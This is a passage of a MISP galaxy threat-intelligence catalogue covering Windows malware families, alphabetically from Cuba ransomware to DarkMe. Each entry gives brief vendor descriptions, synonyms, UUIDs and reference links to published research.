- https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf - webarchive
- https://www.mandiant.com/resources/unc2596-cuba-ransomware - webarchive
- https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/ - webarchive
- https://securelist.com/cuba-ransomware/110533/ - webarchive
- https://blog.group-ib.com/hancitor-cuba-ransomware - webarchive
- https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html - webarchive
- https://www.ic3.gov/Media/News/2021/211203-2.pdf - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ - webarchive
- https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/ - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more - webarchive
- https://lab52.io/blog/cuba-ransomware-analysis/ - webarchive
- https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cuegoe
Internal MISP references
UUID 1dc53eb8-ffae-4823-9c11-3c01514398b9
which can be used as unique global reference for Cuegoe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe - webarchive
- https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cueisfry
Internal MISP references
UUID 64d40102-c296-4a85-9b9c-b3afb6d58e09
which can be used as unique global reference for Cueisfry
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cur1Downloader
Potential Lazarus sample.
Internal MISP references
UUID cca4f240-ac69-437e-b02a-5483ebef5087
which can be used as unique global reference for Cur1Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
- https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ - webarchive
- https://twitter.com/RedDrip7/status/1595365451495706624 - webarchive
- https://securelist.com/bluenoroff-methods-bypass-motw/108383/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Curator
Profero describes this as a ransomware family that uses CryptoPP as a library for file encryption with the Salsa20 algorithm and protects the encryption keys with RSA-2048.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Curator.
Known Synonyms |
---|
Ever101 |
SunnyDay |
Internal MISP references
UUID f1d2093b-e008-4591-8a67-5b9c7684b8c6
which can be used as unique global reference for Curator
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.curator - webarchive
- https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/ - webarchive
- https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/ - webarchive
- https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cursed Murderer
Ransomware.
Internal MISP references
UUID 600a73bf-d699-4400-ac35-6aed4ae5e528
which can be used as unique global reference for Cursed Murderer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CustomerLoader
CustomerLoader is a .NET-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.
Internal MISP references
UUID b002e530-38d5-48cf-90a9-5731871fae32
which can be used as unique global reference for CustomerLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.customerloader - webarchive
- https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/ - webarchive
- https://blog.sekoia.io/customerloader-a-new-malware-distributing-a-wide-variety-of-payloads/#h-c2-servers - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cutlet
Internal MISP references
UUID 8945d785-9d43-49ee-b210-4adeb8a24ab9
which can be used as unique global reference for Cutlet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet - webarchive
- https://explore.group-ib.com/htct/hi-tech_crime_2018 - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf - webarchive
- http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cutwail
Internal MISP references
UUID 9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b
which can be used as unique global reference for Cutwail
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://darknetdiaries.com/episode/110/ - webarchive
- https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CyberGate
According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to the victim's system. Attackers can remotely connect to the compromised system from anywhere in the world. The malware author generally uses this program to steal private information like passwords, files, etc. It might also be used to install malicious software on the compromised systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CyberGate.
Known Synonyms |
---|
Rebhip |
Internal MISP references
UUID 062d8577-d6e6-4c97-bcac-eb6eb1a50a8d
which can be used as unique global reference for CyberGate
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://blog.reversinglabs.com/blog/rats-in-the-library - webarchive
- https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns - webarchive
- https://blog.cyber5w.com/cybergate-malware-analysis - webarchive
- https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf - webarchive
- https://sectrio.com/wp-content/uploads/2021/08/cybergate-threat-report.pdf - webarchive
- https://citizenlab.ca/2015/12/packrat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CyberSplitter
Internal MISP references
UUID 8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa
which can be used as unique global reference for CyberSplitter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CycBot
Internal MISP references
UUID dcdd98a7-aad2-4a96-a787-9c4665bbb1b8
which can be used as unique global reference for CycBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cyrat
According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.
Internal MISP references
UUID 1995ed0a-81d9-43ca-9b38-6f001af84bbc
which can be used as unique global reference for Cyrat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
cysxl
Internal MISP references
UUID 8db13fca-8f75-44dd-b507-e4d3f9c69d78
which can be used as unique global reference for cysxl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dacls (Windows)
According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.
Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dacls (Windows).
Known Synonyms |
---|
MATA |
Internal MISP references
UUID 7c2b19be-f06b-4b21-b003-144e92d291d1
which can be used as unique global reference for Dacls (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf - webarchive
- https://blog.netlab.360.com/dacls-the-dual-platform-rat/ - webarchive
- https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/dark-river-you-can-t-see-them-but-they-re-there/ - webarchive
- https://malwareandstuff.com/peb-where-magic-is-stored/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://www.sygnia.co/mata-framework - webarchive
- https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DADJOKE
DADJOKE was discovered being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro that issues multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality and is made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019; DADJOKE is attributed with medium confidence to APT40.
Internal MISP references
UUID 3cf1aa5a-c19d-4b50-a604-e445e1e2b4f1
which can be used as unique global reference for DADJOKE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke - webarchive
- https://twitter.com/a_tweeter_user/status/1154764787823316993 - webarchive
- https://www.youtube.com/watch?v=vx9IB88wXSE - webarchive
- https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9 - webarchive
- https://twitter.com/ClearskySec/status/1110941178231484417 - webarchive
- https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts - webarchive
- https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DADSTACHE
Internal MISP references
UUID cd9aac83-bdd0-4622-ae77-405d5b9c1dc5
which can be used as unique global reference for DADSTACHE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache - webarchive
- https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html - webarchive
- https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97 - webarchive
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign - webarchive
- https://twitter.com/killamjr/status/1204584085395517440 - webarchive
- https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a - webarchive
- https://twitter.com/cyb3rops/status/1199978327697694720 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dairy
Internal MISP references
UUID 92960f1f-5099-4e38-a177-14a5e3b8d601
which can be used as unique global reference for Dairy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DanaBot
Proofpoint describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on "quality over quantity" in email-based threats. DanaBot's modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
Internal MISP references
UUID 4f7decd4-054b-4dd7-89cc-9bdb248f7c8a
which can be used as unique global reference for DanaBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot - webarchive
- https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/ - webarchive
- https://www.youtube.com/watch?v=04RsqP_P9Ss - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/ - webarchive
- https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques - webarchive
- https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://securelist.com/tusk-infostealers-campaign/113367/ - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity - webarchive
- https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1 - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://twitter.com/MsftSecIntel/status/1730383711437283757 - webarchive
- https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html - webarchive
- https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot - webarchive
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ - webarchive
- https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.esentire.com/blog/danabots-latest-move-deploying-icedid - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/ - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://asec.ahnlab.com/en/30445/ - webarchive
- https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.mandiant.com/resources/supply-chain-node-js - webarchive
- https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed - webarchive
- https://security-soup.net/decoding-a-danabot-downloader/ - webarchive
- https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/ - webarchive
- https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor - webarchive
- https://www.esentire.com/blog/from-darkgate-to-danabot - webarchive
- https://malwareandstuff.com/deobfuscating-danabots-api-hashing/ - webarchive
- https://research.checkpoint.com/danabot-demands-a-ransom-payment/ - webarchive
- https://twitter.com/f0wlsec/status/1459892481760411649 - webarchive
- https://blog.lexfo.fr/danabot-malware.html - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns - webarchive
- https://asert.arbornetworks.com/danabots-travels-a-global-perspective/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0 - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/ - webarchive
- https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
danbot
Danbot is a backdoor malware originally written in C#; recent versions are written in C++. Danbot gives a remote attacker remote-access features such as running a cmd command, uploading and downloading files, and moving and copying files. The backdoor commands are transmitted over either HTTP or DNS. The commands are encapsulated in an XML file that is stored on disk; Danbot's backdoor component picks up the XML file, then decodes and decrypts the commands.
Internal MISP references
UUID 98d3c6b3-c29f-46ba-b24d-88b135cd3183
which can be used as unique global reference for danbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf - webarchive
- https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-lyceum - webarchive
- https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Daolpu
Internal MISP references
UUID 2e4139f0-f2b7-4507-a7f9-0ae48c1c2796
which can be used as unique global reference for Daolpu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.daolpu - webarchive
- https://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/ - webarchive
- https://www.loginsoft.com/post/blue-screen-mayhem-when-crowdstrikes-glitch-became-threat-actors-playground - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkBit
Internal MISP references
UUID abf5436b-23e4-4dec-8c98-0e95a499be78
which can be used as unique global reference for DarkBit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit - webarchive
- https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel - webarchive
- https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/ - webarchive
- https://twitter.com/luc4m/status/1626535098039271425 - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/ - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkCloud Stealer
This stealer is written in Visual Basic.
Internal MISP references
UUID 43601d72-1df5-4d95-8cdc-ad9754aa5d72
which can be used as unique global reference for DarkCloud Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkComet
DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After it was used in the Syrian civil war in 2011, Lesueur decided to stop developing the trojan. DarkComet provides control over a compromised system through a simple graphical user interface, and experts think this user-friendliness is the key to its mass success.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkComet.
Known Synonyms |
---|
Breut |
Fynloski |
klovbot |
Internal MISP references
UUID 5086a6e0-53b2-4d96-9eb3-a0237da2e591
which can be used as unique global reference for DarkComet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=7481257469 - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- https://any.run/cybersecurity-blog/darkcomet-rat-technical-analysis/ - webarchive
- https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet - webarchive
- https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966 - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf - webarchive
- https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/ - webarchive
- http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DARKDEW
Mandiant associates this malware with UNC4191; it spreads to removable drives.
Internal MISP references
UUID 16d9f98d-4da6-419d-89f7-8c30418255ae
which can be used as unique global reference for DARKDEW
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkEye
Internal MISP references
UUID ccbc93b4-fd7a-4926-88f3-bcf5a1c530a5
which can be used as unique global reference for DarkEye
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkGate
First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkGate.
Known Synonyms |
---|
Meh |
MehCrypter |
Internal MISP references
UUID 977ef666-33b7-41d4-9d98-15ab0d16bede
which can be used as unique global reference for DarkGate
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate - webarchive
- https://decoded.avast.io/janrubin/meh-2-2/ - webarchive
- https://blog.talosintelligence.com/darkgate-remote-template-injection/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates - webarchive
- https://www.trellix.com/about/newsroom/stories/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/ - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://www.vmray.com/cyber-security-blog/darkgate-from-autoit-to-shellcode-execution/ - webarchive
- https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams - webarchive
- https://embeeresearch.io/decoding-a-simple-visual-basic-vbs-script-darkgate-loader/ - webarchive
- https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md - webarchive
- https://embee-research.ghost.io/practical-signatures-for-identifying-malware-with-yara/ - webarchive
- https://embee-research.ghost.io/decoding-a-simple-visual-basic-vbs-script-darkgate-loader/ - webarchive
- https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html - webarchive
- https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html - webarchive
- https://www.logpoint.com/en/blog/inside-darkgate/ - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/ - webarchive
- https://x.com/embee_research/status/1736758775326146778 - webarchive
- https://infosec.exchange/@spamhaus/113402246487904714 - webarchive
- https://blog.sekoia.io/darkgate-internals/ - webarchive
- https://medium.com/s2wblog/detailed-analysis-of-darkgate-investigating-new-top-trend-backdoor-malware-0545ecf5f606 - webarchive
- https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py - webarchive
- https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response - webarchive
- https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ - webarchive
- https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors - webarchive
- https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html - webarchive
- https://dshield.org/diary/Guest+Diary+Dissecting+DarkGate+Modular+Malware+Delivery+and+Persistence+as+a+Service/30700/ - webarchive
- https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ - webarchive
- https://decoded.avast.io/janrubin/complex-obfuscation-meh/ - webarchive
- https://www.esentire.com/blog/from-darkgate-to-danabot - webarchive
- https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/ - webarchive
- https://kienmanowar.wordpress.com/2024/06/06/quicknote-darkgate-make-autoit-great-again/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/ - webarchive
- https://medium.com/@DCSO_CyTec/shortandmalicious-darkgate-d9102a457232 - webarchive
- https://www.kroll.com/en/insights/publications/cyber/brute-forcing-darkgate-encodings - webarchive
- https://github.security.telekom.com/2023/08/darkgate-loader.html - webarchive
- https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/ - webarchive
- https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkIRC
Internal MISP references
UUID 8258311c-0d64-4c6b-ab94-915e2cc267f0
which can be used as unique global reference for DarkIRC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkLoader
Internal MISP references
UUID 269be5a3-471c-4a4b-a5d7-97ce75579213
which can be used as unique global reference for DarkLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkMe
Internal MISP references
UUID 1dda5df9-5c92-44a4-b1c7-a09b71bc1553
which can be used as unique global reference for DarkMe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
